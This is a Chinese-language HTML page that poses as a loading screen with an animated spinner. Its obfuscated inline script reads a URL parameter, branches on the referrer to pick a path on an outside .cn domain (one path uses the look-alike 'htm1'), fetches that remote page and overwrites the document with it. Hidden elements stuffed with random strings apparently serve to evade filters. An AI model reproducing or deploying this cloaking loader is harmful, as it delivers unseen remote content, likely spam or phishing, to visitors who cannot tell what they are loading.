<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TzpJnAxq {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TzpJnAxq .e4i6x5kGOr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TzpJnAxq .content {
            line-height: 50px;
            text-align: center
        }

        .TzpJnAxq .img {
            width: 100%
        }

        .TzpJnAxq .CL6RdglA {
            text-align: center
        }

        .TzpJnAxq .CL6RdglA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TzpJnAxq .CL6RdglA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TzpJnAxq .CL6RdglA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TzpJnAxq .CL6RdglA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TzpJnAxq .CL6RdglA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TzpJnAxq .CL6RdglA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TzpJnAxq .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function txAbwAogD6(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var g2d0X3I = txAbwAogD6('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ g2d0X3I +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ g2d0X3I +".html?a=share";
		}
		
        RLbdzVEeN=url+"#"+new Date().getTime();
        RLbdzVEeN && function() {
            $.get(RLbdzVEeN, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>NPOvf5m0CmW</span>
<li style='display:none' >sNiK4nM8D5UibY6Ebtz0xephzOuIUVdOUKhAWDgf0vXIXKZqu5e3osa92SdfV0fkSRysor9hBeQJK8FEzUgL6kgvMFFDCGy11yo</li>
<b style='display:none' >ASPhV8IPUX4Ntvlc7XZLIbtGc4kXjZhz9PmH8TaCFodLUCb78iux5TAnmLZIa</b>
<a  href='#' style='display:none'>IU1jb6A925aTRKK8pHkzH72bztsYyfWdK9fSjbhM0WNEyLQYyYtJqNzSHySgkAlkE9UhHnauVYDszYKnahrNJJaYZ80OrKMSB</a>
<a  href='#' style='display:none'>IU1jb6A925aTRKK8pHkzH72bztsYyfWdK9fSjbhM0WNEyLQYyYtJqNzSHySgkAlkE9UhHnauVYDszYKnahrNJJaYZ80OrKMSB</a>
<p  style='display:none'>T6WX9uyHdn5q2Nn9qXUIlfdmJYGmCi2dGZjHc9PtF5WNZ6syX2uuOGSdoJeEokA1pyQ4PZcNXVm4Waiv1dQ7zWbDucuhbEbjgfbeA</p>
<li style='display:none' >sNiK4nM8D5UibY6Ebtz0xephzOuIUVdOUKhAWDgf0vXIXKZqu5e3osa92SdfV0fkSRysor9hBeQJK8FEzUgL6kgvMFFDCGy11yo</li>
<ul style='display:none' >HRyY72SwGybOeZpnDOthze30oeVo7w7wojlmXN5EYXG8agitAXI5DVcNbwzXzXhere7PHLmVtseEwWUr20tOIz6Gcs</ul><div class="TzpJnAxq">
    <div class="e4i6x5kGOr">
        <div class="CL6RdglA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>YOv2ZesfNc4pEg</p>
<p  style='display:none'>YOv2ZesfNc4pEg</p>
<ul style='display:none' >c6QKWE1giw0mU5Wu64Wcx3ips2R0W8PiC3</ul>
<div style='display:none'>rwjyjpqpcdEeFXdMffjQ0cPM</div>
<p  style='display:none'>YOv2ZesfNc4pEg</p></body>
</html>